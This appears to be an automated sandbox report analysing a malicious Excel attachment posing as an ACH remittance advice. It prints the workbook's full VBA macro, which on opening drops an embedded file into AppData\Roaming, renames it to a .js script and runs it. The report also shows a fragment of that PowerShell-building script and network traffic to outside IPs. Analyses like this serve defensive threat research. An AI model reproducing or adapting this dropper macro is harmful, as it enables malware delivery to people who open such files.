                SHA1:B19441BD94A28ECCB85F8FEACFB961701EF96B4F
                SHA-256:56DF702752FFFF6F6A6C208CD816F0C0310D16BB970F4C9BBA0D98C1D8C070BC
                SHA-512:777418DECE3A30F4072A5425F052D28386B9A8ED4C33C2AD26BAE0C82247054607206F55E5890AFB73E65F9C475B01CF34DA294576A3A75B3E6CDA1DCA6541CA
                Malicious:true
                Preview:......................>.......................................................g........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...h.......i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

                Static File Info

                General

                File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: Eng Moha, Last Saved By: Administrator, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 19:17:20 2015, Last Saved Time/Date: Thu Aug 25 14:19:58 2022, Security: 0
                Entropy (8bit):6.6858198191962
                TrID:
                • Microsoft Excel sheet (30009/1) 47.99%
                • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                File name:ACH Remittance Advice_CITI25822.xls
                File size:122880
                MD5:3af8864299165b527737ecb59ec7f47b
                SHA1:7199e298af1f0f3273a3e6d9b4186805211c58b5
                SHA256:f9b92212d4dbdbddabd88e8e49a5672b5a5bb8fc29243628578fd037de26fcfa
                SHA512:8035746e5298e46eabf87e1c3fd49af3ceac6e35d841bb23a5ec774d14983a07ba98e93a23d6f279c83d012b1c04cba724a95ad1ff466f40d44055911052a438
                SSDEEP:3072:lk3hOdsylKlgxopeiBNhZFGzE+cL2kdAHzqwa+A3nMS7+9Ns7SsK8:lk3hOdsylKlgxopeiBNhZF+E+W2kdAWK
                TLSH:CEC38D7AB6818427DE9903358FE68E4B3379FC52AE1387473602776D2E775C04E62B21
                File Content Preview:........................>.......................................................g..............................................................................................................................................................................

                File Icon

                Icon Hash:e4eea286a4b4bcb4

                Static OLE Info

                General

                Document Type:OLE
                Number of OLE Files:1

                OLE File "ACH Remittance Advice_CITI25822.xls"

                Indicators
                Has Summary Info:
                Application Name:Microsoft Excel
                Encrypted Document:False
                Contains Word Document Stream:False
                Contains Workbook/Book Stream:True
                Contains PowerPoint Document Stream:False
                Contains Visio Document Stream:False
                Contains ObjectPool Stream:False
                Flash Objects Count:0
                Contains VBA Macros:True
                Summary
                Code Page:1252
                Author:Eng Moha
                Last Saved By:Administrator
                Create Time:2015-06-05 18:17:20
                Last Saved Time:2022-08-25 13:19:58
                Creating Application:Microsoft Excel
                Security:0
                Document Summary
                Document Code Page:1252
                Thumbnail Scaling Desired:False
                Company:
                Contains Dirty Links:False
                Shared Document:False
                Changed Hyperlinks:False
                Application Version:1048576

                Streams with VBA

                VBA File Name: Sheet1, Stream Size: 977
                General
                Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
                VBA File Name:Sheet1
                Stream Size:977
                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . # N . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
                Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 23 4e 95 fa 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                VBA Code
                Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                VBA File Name: ThisWorkbook, Stream Size: 3332
                General
                Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
                VBA File Name:ThisWorkbook
                Stream Size:3332
                Data ASCII:. . . . . . . . . . . . . . . . . . . . . g . . . . . . . . . . . # N . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 . -
                Data Raw:01 16 01 00 00 f0 00 00 00 ec 05 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff f3 05 00 00 67 0a 00 00 00 00 00 00 01 00 00 00 23 4e 89 0c 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                VBA Code
                Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub fSPA()
Dim rdHTJ, aySfhM

Const USER_PROFILE = &H28&
 
  ActiveSheet.OLEObjects(1).Copy
   Set aySfhM = CreateObject(mermkd())
   rdHTJ = ZtYDD(aySfhM, USER_PROFILE)
  
  gfdg = TEwe(aySfhM, rdHTJ)



 srhzflXfC (rdHTJ)
 aySfhM.Open (rdHTJ + "\sfoWQ.js")
 
End Sub

Private Sub Workbook_Activate()
Call fSPA
End Sub

Sub srhzflXfC(rdHTJ)


Name rdHTJ + "\sfoWQ.txt" As rdHTJ + TfmwpR()



End Sub


Private Function TEwe(gdfgdfg, t5fdg00)
 gdfgdfg.Namespace(t5fdg00).Self.InvokeVerb "Paste"
End Function

Private Function TfmwpR()
TfmwpR = "\sfoWQ.js"
End Function

Private Function ZtYDD(vv0edd, e777g00)
 ZtYDD = "C:\Users\" + vv0edd.Namespace(e777g00) + "\AppData\Roaming"
End Function

Private Function mermkd()
mermkd = Range("A1").Value

End Function

                Streams

                Stream Path: \x1CompObj, File Type: data, Stream Size: 108
                General
                Stream Path:\x1CompObj
                File Type:data
                Stream Size:108
                Entropy:4.188499988527259
                Base64 Encoded:True
                Data ASCII:. . . . . . . . . . . . . . . . . . . F . . . . M i c r o s o f t E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 20 00 00 00 1e 4d 69 63 72 6f 73 6f 66 74 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 244
                General
                Stream Path:\x5DocumentSummaryInformation
                File Type:data
                Stream Size:244
                Entropy:2.651752272670879
                Base64 Encoded:False
                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . .
                Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 9f 00 00 00
                Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 220
                General
                Stream Path:\x5SummaryInformation
                File Type:data
                Stream Size:220
                Entropy:3.609942546600991
                Base64 Encoded:False
                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . \\ . . . . . . . t . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . E n g M o h a . . . . . . . . . . . . A d m i n i s t r a t o r . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . x s . . @ . . . . . _ . . . . . . . . .
                Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 ac 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 5c 00 00 00 12 00 00 00 74 00 00 00 0c 00 00 00 8c 00 00 00 0d 00 00 00 98 00 00 00 13 00 00 00 a4 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 0c 00 00 00
                Stream Path: MBD0E02868F/\x1CompObj, File Type: data, Stream Size: 76
                General
                Stream Path:MBD0E02868F/\x1CompObj
                File Type:data
                Stream Size:76
                Entropy:3.093449526469053
                Base64 Encoded:False
                Data ASCII:. . . . . . . . . . . . . . . . . . . . F . . . . O L E P a c k a g e . . . . . . . . . P a c k a g e . 9 q . . . . . . . . . . . .
                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 0c 00 03 00 00 00 00 00 c0 00 00 00 00 00 00 46 0c 00 00 00 4f 4c 45 20 50 61 63 6b 61 67 65 00 00 00 00 00 08 00 00 00 50 61 63 6b 61 67 65 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                Stream Path: MBD0E02868F/\x1Ole10Native, File Type: data, Stream Size: 1253
                General
                Stream Path:MBD0E02868F/\x1Ole10Native
                File Type:data
                Stream Size:1253
                Entropy:5.626025282516848
                Base64 Encoded:True
                Data ASCII:. . . . . s f o W Q . t x t . C : \\ U s e r s \\ A d m i n i s t r a t o r \\ D e s k t o p \\ E x c e l B u i l d e r \\ s f o W Q . t x t . . . . . X . . . C : \\ U s e r s \\ A D M I N I ~ 1 \\ A p p D a t a \\ L o c a l \\ T e m p \\ 2 \\ { C 6 7 3 9 C D 9 - D A F E - 4 F 4 B - B 4 F 9 - 2 7 2 9 F 2 5 1 8 8 0 8 } \\ s f o W Q . t x t . . . . . v a r r = G e t O b j e c t ( e m r k d s f ( ) ) . . . . v a r y 7 e r 0 0 g g = " P o " + " w e r " + " s h " + " e l l " ; . . v a r y y = r . S h e
                Data Raw:e1 04 00 00 02 00 73 66 6f 57 51 2e 74 78 74 00 43 3a 5c 55 73 65 72 73 5c 41 64 6d 69 6e 69 73 74 72 61 74 6f 72 5c 44 65 73 6b 74 6f 70 5c 45 78 63 65 6c 20 42 75 69 6c 64 65 72 5c 73 66 6f 57 51 2e 74 78 74 00 00 00 03 00 58 00 00 00 43 3a 5c 55 73 65 72 73 5c 41 44 4d 49 4e 49 7e 31 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 54 65 6d 70 5c 32 5c 7b 43 36 37 33 39 43 44 39 2d
                Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 107404
                General
                Stream Path:Workbook
                File Type:Applesoft BASIC program data, first line number 16
                Stream Size:107404
                Entropy:6.916408952283569
                Base64 Encoded:True
                Data ASCII:. . . . . . . . Z O . . . . . . . . . . . . . . . . . . . . \\ . p . . . . A d m i n i s t r a t o r B . . . . a . . . . . . . . = . . . . . . . . . . . . . . T h i s W o r k b o o k . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . V j 1 8 . . . . . . . X . @ . . . . . . . . . . " . . . . .
                Data Raw:09 08 10 00 00 06 05 00 5a 4f cd 07 c9 00 02 00 06 08 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 0d 00 00 41 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                Stream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 418
                General
                Stream Path:_VBA_PROJECT_CUR/PROJECT
                File Type:ASCII text, with CRLF line terminators
                Stream Size:418
                Entropy:5.310189377634396
                Base64 Encoded:True
                Data ASCII:I D = " { 1 B 2 6 7 3 1 5 - 1 3 C 3 - 4 B D 3 - 8 3 7 E - 1 1 1 6 E E 3 9 B C 7 9 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 3 3 3 1 8 A D 9 B 9 D D B 9 D D B 9 D D B 9 D D " . . D P B = " 6 6 6 4 D F 2 E 2 1 5 2 5 5 5 3 5 5 5 3 5 5 " . . G C = " 9 9 9 B 2 0 5 5 2 1 5 5
                Data Raw:49 44 3d 22 7b 31 42 32 36 37 33 31 35 2d 31 33 43 33 2d 34 42 44 33 2d 38 33 37 45 2d 31 31 31 36 45 45 33 39 42 43 37 39 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4e 61 6d 65 3d 22 56 42 41 50 72 6f 6a 65 63 74 22 0d 0a 48 65
                Stream Path: _VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 62
                General
                Stream Path:_VBA_PROJECT_CUR/PROJECTwm
                File Type:data
                Stream Size:62
                Entropy:3.0554671543224337
                Base64 Encoded:False
                Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . . .
                Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 00 00
                Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: data, Stream Size: 2787
                General
                Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                File Type:data
                Stream Size:2787
                Entropy:4.334603289799577
                Base64 Encoded:False
                Data ASCII:a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . , . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . . ( . x . 8 . 6 . ) . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ .
                Data Raw:cc 61 b2 00 00 01 00 ff 09 04 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 2c 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
                Stream Path: _VBA_PROJECT_CUR/VBA/dir, File Type: data, Stream Size: 529
                General
                Stream Path:_VBA_PROJECT_CUR/VBA/dir
                File Type:data
                Stream Size:529
                Entropy:6.350368654088815
                Base64 Encoded:True
                Data ASCII:. . . . . . . . . . 0 J . . . H . . H . . " . . H . . . . d . . . . . . . V B A P r o j e c t . . . . . @ . . . . . = . . V . . r . . . . . . . . . @ 2 . e . . . . J < . . . . . . 9 s t d o . l e > . . s . t . . d . o . l . e . ( . . h . % ^ . . * \\ . G { 0 0 0 2 0 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } # 2 . . 0 # 0 # C : \\ . W i n d o w s \\ . S y s W O W 6 4 . \\ . e 2 . t l b # . O L E A u t o m a t i o n . 0 . . A E O f f i c E O D . f . i . c E . . . E 2 D F 8 . D 0 4 C - 5 B F . A - 1 0 1 B - B H
                Data Raw:01 0d b2 80 01 00 04 00 00 00 01 00 30 aa 4a 02 90 03 00 48 02 02 48 09 00 c0 22 14 06 48 03 00 02 00 64 e4 04 08 04 00 0a 00 1c 56 42 41 50 80 72 6f 6a 65 63 74 05 00 1a a8 00 00 40 02 0a 06 02 0a 3d 02 0a 56 07 02 72 01 14 08 06 12 09 02 12 0b 40 32 06 65 06 00 0c 02 4a 3c 09 02 0a 16 00 01 39 73 74 64 6f 08 6c 65 3e 02 19 73 00 74 00 00 64 00 6f 00 6c 00 65 00 28 0d 00 68 00 25

                Network Behavior

                Network Port Distribution

                TCP Packets

                TimestampSource PortDest PortSource IPDest IP
                Aug 26, 2022 00:13:08.579797983 CEST49171443192.168.2.22194.247.196.66
                Aug 26, 2022 00:13:08.579865932 CEST44349171194.247.196.66192.168.2.22
                Aug 26, 2022 00:13:08.579953909 CEST49171443192.168.2.22194.247.196.66
                Aug 26, 2022 00:13:08.590014935 CEST49171443192.168.2.22194.247.196.66
                Aug 26, 2022 00:13:08.590044975 CEST44349171194.247.196.66192.168.2.22
                Aug 26, 2022 00:13:08.757038116 CEST44349171194.247.196.66192.168.2.22
                Aug 26, 2022 00:13:08.757148981 CEST49171443192.168.2.22194.247.196.66
                Aug 26, 2022 00:13:08.775114059 CEST49171443192.168.2.22194.247.196.66
                Aug 26, 2022 00:13:08.775134087 CEST44349171194.247.196.66192.168.2.22
                Aug 26, 2022 00:13:08.775513887 CEST44349171194.247.196.66192.168.2.22
                Aug 26, 2022 00:13:08.977490902 CEST49171443192.168.2.22194.247.196.66
                Aug 26, 2022 00:13:09.071933985 CEST49171443192.168.2.22194.247.196.66
                Aug 26, 2022 00:13:09.115381956 CEST44349171194.247.196.66192.168.2.22
                Aug 26, 2022 00:13:09.122982025 CEST44349171194.247.196.66192.168.2.22
                Aug 26, 2022 00:13:09.123051882 CEST44349171194.247.196.66192.168.2.22
                Aug 26, 2022 00:13:09.123117924 CEST44349171194.247.196.66192.168.2.22
                Aug 26, 2022 00:13:09.123202085 CEST49171443192.168.2.22194.247.196.66
                Aug 26, 2022 00:13:09.123213053 CEST49171443192.168.2.22194.247.196.66
                Aug 26, 2022 00:13:09.127052069 CEST49171443192.168.2.22194.247.196.66
                Aug 26, 2022 00:13:15.143914938 CEST4917280192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:15.145087957 CEST4917380192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:15.253335953 CEST8049172209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:15.253509045 CEST4917280192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:15.254054070 CEST8049173209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:15.254125118 CEST4917380192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:15.295965910 CEST4917280192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:15.406044006 CEST8049172209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:15.406085968 CEST8049172209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:15.406114101 CEST8049172209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:15.406138897 CEST8049172209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:15.406152964 CEST4917280192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:15.406222105 CEST4917280192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:15.406225920 CEST4917280192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:17.479048014 CEST4917280192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:17.590606928 CEST8049172209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:17.590651989 CEST8049172209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:17.590677023 CEST8049172209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:17.590703964 CEST8049172209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:17.590728998 CEST8049172209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:17.590753078 CEST8049172209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:17.590778112 CEST8049172209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:17.590802908 CEST4917280192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:17.590843916 CEST4917280192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:17.590850115 CEST4917280192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:17.701261044 CEST8049172209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:17.701291084 CEST8049172209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:17.701308966 CEST8049172209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:17.701327085 CEST8049172209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:17.701332092 CEST4917280192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:17.701345921 CEST8049172209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:17.701355934 CEST4917280192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:17.701359987 CEST4917280192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:17.701363087 CEST4917280192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:17.701364994 CEST8049172209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:17.701375008 CEST4917280192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:17.701383114 CEST8049172209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:17.701402903 CEST4917280192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:17.701410055 CEST4917280192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:17.701446056 CEST8049172209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:17.701463938 CEST8049172209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:17.701483011 CEST8049172209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:17.701486111 CEST4917280192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:17.701491117 CEST4917280192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:17.701500893 CEST8049172209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:17.701520920 CEST4917280192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:17.701529980 CEST4917280192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:17.701570034 CEST8049172209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:17.701587915 CEST8049172209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:17.701606035 CEST8049172209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:17.701607943 CEST4917280192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:17.701618910 CEST4917280192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:17.701632977 CEST4917280192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:17.702586889 CEST4917280192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:17.812177896 CEST8049172209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:17.812268972 CEST8049172209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:17.812319040 CEST8049172209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:17.812315941 CEST4917280192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:17.812361002 CEST4917280192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:17.812367916 CEST4917280192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:19.633969069 CEST4917380192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:19.633999109 CEST4917280192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:21.653584957 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:21.763968945 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:21.764117956 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:21.764863014 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:21.876075029 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:21.876111031 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:21.876133919 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:21.876157045 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:21.876158953 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:21.876195908 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:21.985343933 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:21.985383987 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:21.985408068 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:21.985421896 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:21.985431910 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:21.985459089 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:21.985466003 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:21.985482931 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:21.985508919 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:21.985532999 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:21.985532999 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:21.985567093 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:22.095170975 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:22.095207930 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:22.095247030 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:22.095271111 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:22.095310926 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:22.095314026 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:22.095340967 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:22.095412970 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:22.095438957 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:22.095464945 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:22.095489979 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:22.095518112 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:22.095544100 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:22.095634937 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:22.095663071 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:22.095688105 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:22.096246004 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:22.096260071 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:22.096280098 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:22.096282959 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:22.096286058 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:22.096287966 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:22.096291065 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:22.096292973 CEST4917480192.168.2.22209.127.20.13
